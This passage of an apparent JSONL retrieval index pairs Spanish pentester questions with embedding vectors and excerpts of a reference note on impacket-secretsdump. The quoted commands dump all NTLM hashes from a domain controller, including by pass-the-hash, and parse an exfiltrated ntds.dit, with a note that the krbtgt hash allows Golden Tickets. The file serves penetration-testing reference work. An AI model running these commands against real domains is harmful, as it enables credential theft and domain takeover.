0.04737, -0.00456, -0.05228, 0.01505, 0.01675, -0.02953, 0.02581, -0.06769, -0.01969, -0.04111, 0.05404, -0.02283, 0.01766, 0.00103, 0.00472, 0.0637, -0.01493, 0.01297, -0.0543, 0.05397, -0.07539, -0.01835, 0.01777, 0.02478, 0.02407, 0.02129, -0.0101, -0.05348, -0.02015, 0.01695, -0.00906, 0.00113, 0.00062, -0.02518, 0.01811, -0.02447, 0.07037, -0.02907, 0.00958, -0.04003, -0.01754, -0.01536, 0.00367, 0.03489, -0.00185, 0.01695, 0.04732, -0.02532, -0.05422, 6e-05, 0.042, 0.06867, -0.06218, -0.01752, -0.02157, -0.01502, 0.04289, -0.04068, 0.01073, -0.00474, -0.03838, -0.02459, 0.05884, -0.00644, -0.01878, 0.02676, -0.03213, 0.01707, -0.02771, -0.00522, 0.03484, 0.03217, 0.0344, -0.02661, -0.06013, 0.06496, -0.02633, 0.03086, -0.03478, -0.06593, -0.05015, 0.08008, 0.02596, -0.02379, 0.0294, 0.00816, 0.01238, 0.04047, 0.04074, 0.03932, 0.00406, 0.01973, 0.00253, 0.01689, -0.01364, 0.00936, 0.0066, 0.05443, -0.0072, 0.00482, -0.00929, 0.01007, 0.01287, -0.02704, -0.04464, -0.04706, -0.04876, 0.05186, -0.01352, -0.02318, 0.02484, -0.0439, 0.01212, 0.01867, -0.01359, 0.05818]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# secretsdump (NTDS.dit / SAM)\n\n> `impacket-secretsdump` vuelca **todos los hashes** del dominio (NTDS.dit) o de una mΓ‘quina (SAM/SYSTEM), en remoto o desde ficheros. Parte de Impacket.", "indexar": "ΒΏquΓ© herramienta sirve para volcar hashes locales y remotos desde SAM?", "v": [-0.00736, -0.07517, -0.10842, -0.09521, -0.01358, -0.15105, 0.02044, -0.06302, 0.0231, 0.04517, -0.19349, -0.12613, 0.0848, -0.06965, 0.17099, 0.16724, 0.0262, -0.04778, -0.07961, 0.06525, 0.00235, -0.02081, -0.07891, 0.06119, -0.04036, -0.0341, 0.12307, -0.00146, -0.24029, -0.01695, 0.09625, 0.0144, -0.0161, 0.0312, -0.10426, -0.07016, 0.04435, 0.07969, -0.03141, 0.03894, 0.09689, 0.02161, -0.17156, -0.04364, 0.05858, -0.03758, -0.07166, -0.00749, 0.07401, 0.00522, -0.07533, -0.0867, -0.1162, -0.05458, 0.01588, -0.07257, 0.20082, -0.09437, -0.07113, -0.03971, -0.05064, -0.09714, 0.07382, 0.02056, 0.07928, -0.15198, -0.00712, -0.0747, -0.10916, 0.06926, -0.07354, 0.04522, 0.13729, -0.01137, -0.06415, 0.05022, -0.08204, 0.02872, 0.13472, -0.07705, 0.02954, -0.0539, -0.00908, -0.04371, -0.08056, -0.06442, 0.11786, -0.01854, 0.05311, -0.07046, 0.00404, 0.01891, 0.05477, 0.01595, -0.03015, -0.0004, 0.02252, -0.03982, -0.02773, -0.02498, 0.04111, -0.06879, -0.03073, 0.05126, -0.00119, -0.0074, 0.04491, -0.03128, 0.00438, 0.01715, 0.13519, 0.00676, -0.003, 0.03935, -0.04779, -0.04718, 0.00342, 0.05823, 0.01419, 0.05171, -0.00596, -0.02678, 0.0107, -0.01581, 0.0456, -0.02691, -0.08458, 0.0939, 0.0269, 0.00554, 0.05401, -0.03295, -0.02187, -0.02811, 0.03104, -0.03061, 0.0368, -0.12403, 0.02036, -0.08058, 0.04353, 0.03711, 0.00602, -0.05919, 0.04047, 0.01344, 0.00078, 0.01387, 0.03698, 0.03218, 0.03384, -0.04261, -0.02423, 0.07229, -0.07239, 0.05653, -0.03855, -0.02482, -0.12165, 0.04857, 0.00955, -0.01212, 0.03906, -0.01685, 0.00592, -0.06309, 0.01741, -0.02419, 0.11697, 0.09284, -0.07478, 0.05568, 0.00803, -0.05823, -0.07296, -0.07596, 0.02092, 0.00282, -0.04099, -0.08911, -0.04286, 0.00302, 0.00118, -0.02026, 0.10994, -0.01068, 0.0564, -0.00251, 0.02382, -0.00874, -0.01428, -0.03132, -0.01914, -0.02851, 0.00779, 0.0084, -0.0339, -0.0376, 0.03214, 0.02341, -0.07621, -0.05601, -0.00649, 0.00128, 0.11736, 0.07578, -0.07401, 0.01578, -0.02181, 0.07654, -0.03645, -0.01309, 0.05387, 0.00924, -0.03746, -0.07432, -0.02102, -0.04357, 0.01327, 0.01479, -0.01876, 0.00126, 0.05931, 0.00068, 0.01985, 0.07127, 0.06186, 0.0206, 0.07427, -0.01846, 0.0427, 0.01712, -0.03682, -0.02615, 0.00705, -0.07738, 0.03612, -0.01224, -0.06518, -0.00847, -0.02863, 0.06466, -0.00637, -0.03609, -0.04189, -0.073, -0.09366, 0.02933, -0.00158, -0.01445, -0.04575, -0.01036, 0.08904, 0.01591, -0.02003, -0.01528]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# secretsdump (NTDS.dit / SAM)\n\n> `impacket-secretsdump` vuelca **todos los hashes** del dominio (NTDS.dit) o de una mΓ‘quina (SAM/SYSTEM), en remoto o desde ficheros. Parte de Impacket.", "indexar": "cual es una alternativa libre a secretsdump para recuperar credenciales?", "v": [-0.0649, -0.05115, -0.09499, 0.02328, -0.05552, -0.09047, -0.09341, 0.02084, -0.1505, -0.08193, -0.0368, -0.05967, -0.08002, -0.03425, 0.0882, 0.01027, -0.03866, 0.0043, 0.2064, 0.01919, 0.00327, -0.12183, -0.1391, -0.13324, -0.01772, -0.0967, -0.00119, 0.15343, 0.04053, -0.00179, 0.03138, 0.01814, -0.02277, 0.02824, -0.0956, 0.12614, 0.09484, 0.11269, 0.02186, 0.06526, 0.05655, -0.05222, -0.00934, 0.0911, 0.039, -0.11742, -0.10354, 0.09202, -0.01655, -0.01851, -0.13858, -0.08478, -0.08302, -0.12697, 0.07183, -0.00469, 0.06261, -0.06367, -0.03469, -0.02412, -0.06266, 0.06355, 0.14362, 0.05861, 0.10101, -0.10587, -0.05368, -0.08982, -0.09638, 0.13609, 0.01215, -0.0346, 0.11181, 0.00675, -0.13554, -0.03385, -0.02487, -0.0188, 0.03884, 0.08484, 0.03138, -0.09158, 0.00776, 0.10222, 0.00913, -0.12737, -0.01564, -0.03749, -0.07114, 0.0522, 0.05145, 0.03736, -0.00617, 0.18377, -0.06572, -0.03918, -0.01687, 0.11553, -0.11025, 0.08071, 0.00326, 0.00403, -0.10575, 0.03023, -0.0312, 0.05186, -0.01609, 0.08538, -0.0887, 0.0185, -0.01008, 0.09284, 0.05801, 0.11586, 0.00944, -0.00077, -0.05107, 0.06346, 0.03325, 0.058, -0.03321, -0.07745, -0.01591, -0.02593, -0.02659, 0.02825, 0.04277, 0.02639, -0.01842, -0.06171, -0.0237, -0.00239, -0.02418, -0.02903, -0.04752, -0.07525, 0.04858, -0.00257, -0.00336, 0.00614, 0.06457, -0.01852, 0.01226, -0.02382, 0.02813, -0.02964, 0.05541, -0.07179, 0.06517, -0.09394, -0.02401, 0.07349, 0.00144, 0.07239, -0.01863, 0.04094, -0.02362, -0.08136, -0.06889, 0.07925, -0.0707, -0.04008, -0.00895, -0.00699, 0.04034, -0.05597, 0.00474, 0.00561, -0.07643, -0.02354, -0.00891, -0.00288, 0.03291, -0.13564, 0.08306, -0.02784, 0.03677, -0.0944, 0.03597, -0.09027, 0.08986, 0.02763, -0.04161, 0.01753, -0.01984, -0.03697, -0.05027, 0.00061, -0.02385, -0.03934, -0.01151, -0.09993, -0.0296, -0.04213, -0.02161, 0.03028, 0.02152, -0.05102, 0.02234, 0.03096, -0.0719, -0.00215, -0.00537, -0.01794, 0.03624, -0.03589, -0.02131, 0.01053, -0.02518, 0.01737, 0.08919, -0.02964, 0.09536, 0.00872, -0.08861, -0.01828, -0.03768, -0.01601, -0.08638, -0.04411, 0.08446, 0.0156, 0.03075, 0.03205, -0.00121, -0.04097, 0.03644, 0.06461, -0.03631, 0.00726, -0.00144, 0.0648, -0.03894, 0.04043, 0.03644, -0.04677, -0.0127, 0.0164, 0.03622, -0.01511, 0.00687, 0.09496, -0.00463, -0.05667, -0.00785, 0.00302, -0.03683, 0.005, 0.00248, 0.02099, -0.02038, 0.07525, 0.02194, -0.02038, 0.0315, -0.01642]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Remoto contra un DC\n```bash\nimpacket-secretsdump dominio/usuario:password@DC_IP\nimpacket-secretsdump -hashes :NTLMHASH dominio/admin@DC_IP # con Pass-the-Hash\n```\nSaca NTLM de **todos** los usuarios + el hash de **krbtgt** β†’ Golden Ticket.", "indexar": "que herramienta puedo usar para sacar las credenciales de todos los usuarios en un dominio", "v": [-0.07686, 0.0328, -0.22928, -0.12402, -0.01029, -0.12051, 0.01483, -0.06783, -0.094, -0.00779, -0.10799, -0.09561, -0.03045, -0.1886, -0.04056, 0.01704, 0.12076, -0.05461, -0.01368, -0.0062, 0.02171, -0.05575, -0.07266, -0.02731, -0.05078, -0.00869, 0.02319, -0.13768, -0.09776, 0.14784, 0.01225, 0.02367, 0.0146, -0.07344, -0.05823, -0.09076, -0.02346, 0.03657, 0.07299, 0.15509, 0.02772, 0.05522, -0.1401, -0.02184, -0.0048, 0.10807, -0.07319, -0.02283, -0.04017, -0.01503, -0.01483, -0.20187, -0.12525, -0.01576, -0.02464, -0.14166, 0.17212, -0.1288, 0.00395, -0.13235, -0.14369, 0.00039, 0.00015, 0.09099, -0.04923, -0.11925, 0.00771, -0.06377, -0.08486, 0.0786, -0.01359, 0.03098, 0.0752, 0.00184, 0.03179, -0.02499, 0.0366, -0.0057, 0.06784, -0.04669, 0.03833, -0.03381, -0.01456, -0.07005, -0.11096, -0.10296, 0.05238, -0.10213, 0.0267, -0.01217, 0.02204, 0.09225, -0.05226, -0.06092, -0.01627, -0.00531, 0.05496, -0.04359, -0.0144, -0.07002, 0.14176, -0.00034, -0.04417, 0.08982, 0.03401, 0.0152, 0.0255, -0.08034, -0.06447, -0.05461, 0.03251, -0.0569, -0.04811, -0.00366, -0.03805, 0.11883, -0.05969, -0.07237, -0.02479, -0.07271, 0.03349, -0.0774, 0.07278, -0.09008, 0.06757, 0.01102, -0.05025, 0.03455, -0.07127, -0.15361, -0.05137, -0.0226, -0.0633, 0.02138, -0.02053, -0.00668, -0.01058, -0.06538, -0.05514, 0.01001, -0.00445, 0.035, -0.12799, -0.12127, 0.02399, -0.043, -0.00269, -0.10138, -0.02278, -0.07392, 0.00682, -0.00505, -0.0301, 0.01774, -0.0251, 0.0483, -0.00741, -0.00698, -0.04731, 0.00401, -0.09099, -0.06602, 0.07022, 0.0271, 0.01917, -0.06065, 0.03005, -0.0271, 0.04376, 0.04512, 0.04679, 0.04908, 0.02137, 0.00179, 0.06395, -0.05044, -0.02961, -0.00694, -0.04488, -0.06711, -0.00884, -0.06992, -0.04127, 0.01329, -0.02094, 0.03771, 0.03095, -0.01367, -0.03541, 0.05725, 0.0159, 0.0793, 0.01351, -0.00556, 0.03167, -0.01936, 0.03548, -0.01778, 0.01956, -0.0253, -0.0704, 0.0026, -0.01227, -0.03579, 0.04453, 0.02209, 0.00098, -0.01168, 0.01585, 0.02654, 0.01989, -0.05947, 0.03224, -0.05325, -0.03272, 0.00916, 0.0083, 0.0073, -0.06075, -0.08723, -0.00408, 0.05968, 0.0016, -0.00428, 0.00729, 0.0441, -0.00018, -0.02975, -0.00985, 0.02845, 0.01249, 0.00546, -0.03682, -0.02619, 0.02257, -0.04283, 0.05876, -0.00495, -0.04501, -0.02132, -0.06496, 0.05941, 0.02986, -0.01216, -0.09433, -0.0385, -0.05106, 0.01977, -0.0439, -0.06392, 0.01823, 0.00945, 0.08912, -0.03242, -0.00853, 0.0302]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Remoto contra un DC\n```bash\nimpacket-secretsdump dominio/usuario:password@DC_IP\nimpacket-secretsdump -hashes :NTLMHASH dominio/admin@DC_IP # con Pass-the-Hash\n```\nSaca NTLM de **todos** los usuarios + el hash de **krbtgt** β†’ Golden Ticket.", "indexar": "cual programa sirve para obtener hashes de NTLM y crear tickets golden", "v": [-0.12297, -0.09596, -0.06737, -0.10205, 0.03845, -0.1407, -0.11071, 0.06184, -0.07763, 0.06254, -0.10043, -0.06209, 0.03488, 0.01071, -0.02503, 0.09715, 0.01849, -0.1301, 0.12997, 0.08079, -0.05737, 0.07961, -0.08127, -0.19838, -0.05668, -0.10846, 0.0704, 0.00119, -0.0959, 0.07896, 0.04353, -0.1282, -0.13378, -0.05761, 0.01857, -0.04436, 0.08047, 0.08969, -0.07699, 0.10514, 0.03321, 0.10019, -0.01013, 0.12591, 0.12485, -0.11463, 0.02941, 0.05764, 0.00465, -0.16375, 0.04205, 0.12868, -0.14287, -0.0688, 0.04754, -0.12654, -0.03555, -0.13422, -0.16542, 0.04287, -0.07695, -0.09918, -0.00886, -0.16578, -0.08763, 0.01054, 0.10085, 0.01189, -0.02069, -0.03283, -0.14576, 0.04698, 0.08845, -0.01858, 0.03614, 0.03399, -0.01479, -0.02051, 0.00271, -1e-05, 0.05535, -0.0351, 0.00144, 0.00112, -0.04516, -0.0468, 0.051, -0.02439, -0.0334, 0.02657, 0.00751, 0.04472, 0.03618, 0.01531, 0.06496, -0.1078, 0.0742, -0.02742, 0.01538, 0.08868, 0.02056, -0.10947, -0.08447, 0.11677, -0.11018, 0.07831, 0.10852, -0.00491, -0.05953, 0.08849, 0.01997, -0.02351, -0.12391, -0.00179, -0.02286, 0.02842, 0.04318, 0.02752, 0.04027, -0.00502, -0.01827, 0.02252, -0.06668, 0.04004, 0.07541, 0.01823, -0.00617, 0.09546, -0.03921, 0.05312, 0.04313, -0.00354, -0.04527, -0.01939, -0.00872, -0.07169, -0.01475, -0.01223, 0.02726, -0.03523, 0.10397, 0.04809, 0.01658, -0.03038, 0.03271, -0.01602, -0.00533, -0.07746, 0.02365, -0.00649, 0.03437, -0.02269, -0.01634, 0.0548, -0.09457, -0.02126, 0.00067, -0.02072, -0.13719, 0.04646, -0.02299, 0.06648, 0.00274, 0.01327, 0.03061, -0.02342, -0.05269, -0.00707, 0.07573, 0.04968, -0.01898, -0.01276, 0.07906, -0.08009, -0.0026, -0.06142, -0.01521, -0.05772, 0.02547, -0.06677, 0.03146, 0.01909, 0.02832, 0.04028, -0.01166, -0.04712, 0.01409, 0.02655, 0.0138, -0.02257, -0.01744, 0.01307, -0.06589, 0.00965, -0.00534, -0.07039, -0.03107, -0.06288, 0.04559, -0.08654, -0.03824, 0.02608, 0.00263, -0.0289, 0.07403, 0.07318, -0.00687, -0.00718, 0.01481, 0.10101, 0.04868, -0.03542, 0.05497, -0.00437, -0.04441, -0.03094, 0.01978, 0.00013, 0.00811, 0.02222, -0.00019, -0.02561, 0.00257, 0.03293, 0.01796, -0.08769, 0.03087, 0.04822, 0.06572, 0.01326, -0.00103, -0.01772, -0.01483, 0.00958, 0.03834, 0.01056, 0.02427, -0.00969, -0.03388, -0.05361, 0.02468, 0.08195, 0.0019, -0.00093, 0.04003, 0.02844, -0.04265, 0.02837, 0.00779, 0.01265, -0.02369, -0.00338, 0.01487, 0.00426, -0.00253, -0.0041]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Remoto contra un DC\n```bash\nimpacket-secretsdump dominio/usuario:password@DC_IP\nimpacket-secretsdump -hashes :NTLMHASH dominio/admin@DC_IP # con Pass-the-Hash\n```\nSaca NTLM de **todos** los usuarios + el hash de **krbtgt** β†’ Golden Ticket.", "indexar": "como extraigo las claves del dominio para hacer pass-the-hash", "v": [0.00557, -0.09489, -0.12267, -0.04373, -0.00822, -0.08831, 0.01118, -0.01204, -0.15247, 0.07672, 0.00037, 0.00694, -0.1308, -0.15118, 0.10487, -0.00954, 0.20579, 0.02848, -0.09274, -0.05116, -0.05217, -0.0366, -0.12841, -0.06036, -0.01431, -0.14524, -0.04962, 0.08358, -0.24048, 0.11755, -0.04787, -0.02092, -0.04991, -0.0093, -0.0223, 0.00942, 0.00341, 0.15671, 0.0567, 0.08852, 0.00067, 0.06658, -0.20411, 0.09314, -0.03328, -0.11408, 0.04409, 0.04992, 0.1004, -0.09652, 0.07743, -0.11386, -0.144, -0.14274, 0.01863, -0.06402, 0.03797, -0.02343, -0.12707, -0.04754, -0.12091, -0.01787, 0.0365, 0.10115, 0.01181, -0.09464, -0.02782, 0.03343, -0.01823, 0.09273, 0.00699, 0.00527, 0.05915, 0.09273, 0.05707, -0.02856, 0.09668, -0.11351, 0.02466, 0.06541, 0.04156, 0.00093, -0.01181, -0.05607, -0.11823, -0.01037, -0.01661, -0.113, 0.08056, 0.05601, 0.07548, 0.05004, 0.06616, -0.0573, -0.01376, 0.00337, -0.03316, -0.09713, -0.00045, -0.0721, 0.01749, 0.11116, -0.10517, 0.15326, 0.08576, 0.03581, -0.02737, -0.02987, -0.01127, 0.03238, 0.01208, -0.0334, -0.04339, -0.05134, -0.00365, 0.04426, 0.00023, 0.02427, -0.02073, 0.01338, -0.0783, -0.03136, 0.08414, -0.01927, -0.00717, -0.01292, -0.03708, -0.02741, -0.01274, -0.13342, -0.00941, 0.02918, -0.06911, 0.02225, 0.05582, 0.11774, 0.07646, 0.00074, -0.09738, -0.00088, -0.0213, 0.02203, -0.03987, 0.08594, 0.03619, -0.06303, 0.02335, -0.02325, -0.07756, 0.03456, -0.06811, 0.00953, 0.00761, -0.00122, -0.02671, 0.00285, -0.08846, 0.02601, -0.0457, 0.08555, -0.05748, -0.0353, -0.14183, 0.0464, 0.05763, -0.00346, 0.00088, -0.01381, -0.02957, -0.00023, 0.00272, -0.02569, -0.0181, -0.03931, 0.02711, -0.02327, 0.02159, -0.03917, -0.04623, -0.0374, 0.01191, -0.05459, 0.01809, 0.08295, -0.02201, 0.0325, 0.05449, 0.00784, -0.0196, 0.01905, 0.02816, 0.04279, -0.06744, 0.06918, -0.01674, -0.01049, 0.00586, -0.04232, -0.00126, 0.00626, 0.01564, 0.01612, 0.04856, -0.04279, 0.00338, -0.00348, -0.04958, -0.05524, 0.01934, 0.02773, 0.01827, -0.01482, -0.03013, -0.01908, -0.02126, 0.00612, -0.07171, 0.05008, -0.04696, -0.0707, -0.01448, 0.10217, -0.03753, 0.02009, 0.00691, 0.03022, -0.00449, 0.02411, 0.04089, 0.05128, -0.00431, 0.01499, 0.00489, 0.04016, 0.02046, -0.02305, -0.01497, 0.01854, -0.02555, 0.00523, -0.02841, -0.01443, 0.0293, -0.01153, -0.04363, -0.00143, -0.03662, 0.07633, 0.0066, 0.007, 0.01591, -0.0201, -0.0111, 0.02356, -0.01424, 0.01244]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# exfiltras ntds.dit + SYSTEM con Transferencia de ficheros, luego:\nimpacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL\n```", "indexar": "que herramienta sirve para extraer credenciales locales desde Windows usando ntds.dit?", "v": [0.01342, 0.00179, -0.16816, -0.07359, 0.11626, -0.03605, -0.1073, -0.043, -0.00881, -0.06029, -0.11527, -0.07305, -0.06713, -0.18365, -0.09618, 0.01033, 0.02691, -0.16285, 0.08497, 0.03262, -0.13227, -0.06129, -0.11136, -0.02937, -0.03511, 0.00947, -0.01031, -0.10168, -0.13662, 0.1482, -0.00164, 0.00902, -0.07197, 0.00278, -0.0656, -0.01759, -0.07275, 0.04398, -0.07963, 0.0501, 0.05597, 0.1447, -0.06619, 0.01723, 0.06876, 0.00265, -0.02166, -0.00122, 0.0298, 0.0129, -0.05569, -0.15192, -0.10891, -0.08356, 0.05657, -0.09941, 0.17468, -0.11568, -0.01304, -0.01464, -0.0729, 0.00901, -0.02711, -0.01314, 0.02159, -0.08277, 0.08292, -0.08979, -0.06287, 0.06996, -0.16692, 0.04363, 0.18276, -0.02321, -0.01104, -0.00412, -0.02647, 0.03596, 0.11602, -0.06404, 0.08949, -0.03779, 0.00264, -0.08778, 0.00503, -0.13765, 0.06595, -0.09671, 0.01125, -0.09083, 0.02802, -0.01556, -0.01845, 0.01828, 0.03053, -0.04415, 0.05096, 0.02019, 0.03091, 0.05358, 0.13855, -0.16629, -0.09453, 0.10931, -0.02259, 0.00222, 0.05266, -0.03915, -0.06236, -0.02772, 0.11368, 0.06357, -0.01871, 0.0133, -0.04599, 0.03911, -0.00102, -0.06934, 0.00503, 0.04268, 0.01921, -0.04229, -0.02492, -0.03374, -0.06201, -0.02909, -0.06517, 0.06795, -0.08389, -0.04364, 0.02956, -0.00525, -0.03124, 0.01944, -0.04931, -0.01394, 0.06521, -0.10491, -0.02481, -0.03466, 0.06397, 0.0229, 0.0328, -0.04147, -0.00986, 0.06307, 0.05351, 0.02024, 0.02265, -0.05368, 0.09985, -0.0497, -0.07413, 0.00606, -0.07715, 0.02487, 0.04674, 0.07039, -0.07339, 0.04389, -0.03731, -0.08747, 0.08806, 0.01227, -0.02473, -0.05939, -0.00525, 0.03813, 0.07959, 0.03667, 0.03708, 0.0691, 0.0058, -0.07133, 0.03985, -0.00281, 0.06163, -0.01972, -0.02751, -0.0559, -0.03435, 0.04769, 0.00323, -0.00015, -0.01151, -0.02134, 0.00705, -0.00595, -0.0586, -0.01035, -0.04658, -0.02042, 0.05079, -0.05177, 0.00667, 0.03451, -0.01345, -0.08442, 0.03132, 0.00819, -0.10174, 0.00073, -0.0132, -0.03249, 0.10157, 0.11113, -0.03191, 0.01338, -0.00125, 0.07525, 0.01132, -0.00132, -0.00755, -0.01478, -0.03136, -0.06503, 0.00925, -0.01413, -0.03636, -0.0441, 0.00167, -0.00378, 0.03864, 0.01964, -0.00076, 0.00229, -0.0355, -0.01661, 0.01382, 0.01237, 0.01825, 0.02079, -0.01689, -0.01042, -0.01974, -0.05676, 0.04798, 0.03358, -0.0419, -0.07584, -0.048, 0.01283, -0.04497, -0.05866, -0.102, -0.02015, -0.01613, -0.00267, 0.0447, -0.05953, 0.03154, -0.01975, 0.0713, -0.00884, -0.0199, 0.06099]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# exfiltras ntds.dit + SYSTEM con Transferencia de ficheros, luego:\nimpacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL\n```", "indexar": "cual programa puedo usar para realizar un dump de secretos y sistema local en una mΓ‘quina Windows?", "v": [0.0517, 0.03359, -0.14411, -0.14793, -0.04597, -0.06908, -0.13551, -0.06532, -0.08036, -0.11347, -0.09923, -0.10772, -0.03314, -0.10722, -0.08931, -0.05472, 0.02723, -0.08087, 9e-05, 0.01192, 0.00132, -0.09045, -0.09001, 0.01868, -0.04613, 0.0869, 0.08704, -0.03575, -0.21162, -0.03867, 0.03074, 0.02263, 0.02547, -0.1532, -0.02435, -0.03201, 0.08371, 0.04544, 0.07843, 0.07066, 0.12794, 0.01855, -0.09029, 0.10472, 0.10783, 0.00375, 0.09527, -0.09109, 0.02553, -0.04235, -0.11338, -0.0308, -0.05429, -0.05268, 0.08358, -0.16595, 0.06314, -0.09563, 0.0132, 0.04483, -0.02161, 0.06753, -0.0569, 0.03958, 0.05234, -0.01097, 0.04216, -0.01413, -0.04492, 0.06643, -0.03222, 0.02712, 0.16168, 0.00982, -0.00166, 0.04605, -0.01289, -0.02832, 0.09686, -0.04715, -0.01797, 0.07099, -0.01195, 0.03315, -0.04337, -0.14618, 0.05032, -0.06538, 0.02066, -0.14369, 0.02327, -0.03267, -0.00062, 0.12183, 0.12695, -0.07303, 0.07407, 0.06098, -0.05664, 0.07858, 0.07318, -0.11523, -0.06215, 0.20763, -0.05145, 0.05827, 0.04385, -0.01599, -0.01005, -0.05012, 0.00869, 0.05192, -0.0797, 0.00611, -0.10211, -0.02807, 0.02033, 0.00071, -0.01425, 0.01682, -0.10833, 0.08169, -0.05218, -0.04934, 0.10259, -0.06042, 0.01133, 0.11537, -0.06046, 0.08669, 0.0594, 0.04386, -0.02796, -0.01437, -0.02643, -0.05854, 0.03522, -0.03041, 0.0175, -0.07391, 0.05287, 0.06682, -0.01672, -0.00743, 0.0472, -0.01467, 0.0863, -0.08295, -0.00504, -0.05032, 0.06151, -0.03116, -0.03069, 0.00757, -0.05037, -0.02827, 0.04526, -0.00087, -0.04516, -0.01037, -0.06329, 0.01215, -0.06322, -0.05494, 0.0152, -0.04909, -0.0074, 0.03422, 0.03864, 0.00107, 0.01337, 0.0438, 0.0275, -0.03189, 0.0241, 0.01797, 0.02247, -0.06699, 0.0189, -0.00916, -0.06588, 0.0987, 0.05612, 0.00598, -0.04139, 0.02057, -0.04599, 0.04009, -0.01338, -0.01623, -0.00987, -0.02709, 0.02616, -0.02929, 0.00921, 0.00233, -0.02109, -0.02481, 0.06585, -0.02771, -0.08377, 0.05375, -0.04157, -0.05726, 0.02478, 0.1042, -0.02174, -0.05524, 0.04646, 0.07433, 0.05584, -0.01977, 0.00806, -0.02446, -0.06126, -0.04486, -0.03334, -0.00093, -0.00749, 0.0004, 0.02916, -0.05222, 0.07419, 0.02676, -0.00888, -0.07004, 0.03446, 0.05467, 0.03463, 0.0008, -0.04179, 0.01189, 0.00279, -0.02249, 0.01006, -0.00787, 0.00152, -0.02393, -0.0411, -0.10762, -0.03462, 0.10618, 0.02662, -0.10869, -0.05184, -0.02921, -0.07014, -0.00813, 0.00105, -0.07167, -0.00886, 0.02263, 0.02125, -0.02257, 0.00838, 0.07388]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# exfiltras ntds.dit + SYSTEM con Transferencia de ficheros, luego:\nimpacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL\n```", "indexar": "con que puedo obtener el SAM y NTDS del sistema local para transferirlo a otro equipo?", "v": [-0.05302, -0.00106, -0.09614, -0.08287, -0.01014, -0.04422, -0.04154, 0.0001, -0.08043, 0.17601, -0.22939, -0.0584, 0.03564, -0.12245, -0.0315, 0.073, 0.06272, -0.09208, 0.08502, 0.02493, 0.01393, -0.09925, -0.00558, -0.09498, 0.11773, 0.06643, -0.04765, -0.06656, -0.18434, 0.07288, 0.06099, -0.00035, 0.03881, -0.05496, 0.10547, -0.16264, 0.06342, 0.11062, 0.03895, 0.00983, 0.08024, 0.08938, -0.02881, 0.09349, 0.1314, -0.09234, -0.02624, -0.07103, 0.12381, -0.1783, -0.09981, 0.03482, -0.15, -0.21408, -0.04792, -0.12068, 0.1221, -0.06892, -0.0164, 0.01103, -0.03622, -0.08276, -0.00622, -0.0198, 0.09038, -0.06561, -0.00842, -0.01595, -0.05588, 0.02944, -0.01665, 0.01205, 0.0831, -0.03082, -0.12733, 0.03143, -0.00653, 0.02181, 0.11024, -0.08549, 0.03789, 0.00681, -0.00281, -0.0258, 0.03032, -0.02476, 0.02508, -0.00987, 0.04342, -0.05784, 0.06513, -0.10767, 0.07849, -0.01192, 0.0579, -0.02519, -0.04708, 0.06115, -0.05526, 0.00293, 0.00704, -0.02705, -0.02028, 0.08199, -0.11453, 0.00373, 0.12592, -0.02262, 0.07168, -0.02079, 0.12716, -0.0174, 0.01678, 0.1216, 0.03992, -0.02907, -0.01774, 0.07858, -0.0707, 0.07229, 0.01146, -0.00131, 0.04173, -0.0631, -0.00715, -0.05228, -0.00958, 0.01275, -0.02878, 0.10334, 0.02828, -0.00218, -0.06379, -0.01039, -0.04404, -0.05242, 0.01874, 0.03628, 0.00723, -0.02104, -0.06113, 0.04456, 0.05399, -0.02712, 0.01873, 0.02218, -0.01759, -0.0543, 0.00302, -0.01686, 0.03076, 0.03087, -0.0513, 0.02297, -0.06621, 0.06675, 0.1057, 0.03004, -0.1048, 0.00991, -0.00571, 0.02686, 0.06792, 0.00652, -0.04095, -0.03715, 0.00616, -0.04388, 0.06939, -0.04829, -0.07549, -0.00748, -0.01739, -0.01636, 0.02181, -0.03052, 0.03472, -0.06911, 0.01187, -0.0291, -0.01079, 0.07467, 0.00678, 0.06548, 0.03815, -0.00181, -0.04219, 0.06216, -0.04477, 0.02169, -0.00138, 0.0446, 0.03895, 0.0109, -0.01613, 0.00684, -0.04969, -0.07102, -0.0028, 0.05845, -0.07306, 0.04461, 0.05749, -0.03745, 0.01268, 0.09042, -0.043, 0.0696, -0.04495, 0.09777, 0.0582, 0.01043, 0.07078, -0.04149, -0.09554, 0.00382, -0.06948, -0.03144, -0.01084, 0.04205, 0.03643, 0.02553, 0.03083, 0.03658, 0.00361, -0.0281, -0.0109, 0.04656, 0.00569, 0.00689, 0.02631, 0.03814, 0.03558, -0.0328, 0.03388, 0.01216, -0.03904, 0.0097, -0.0373, -0.00895, 0.0595, 0.06869, -0.00361, -0.02618, -0.01579, -0.01002, -0.10642, -0.04632, 0.01474, -0.0867, 0.01817, -0.00344, 0.04506, -0.01863, 0.00947, 0.01961]} +{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", 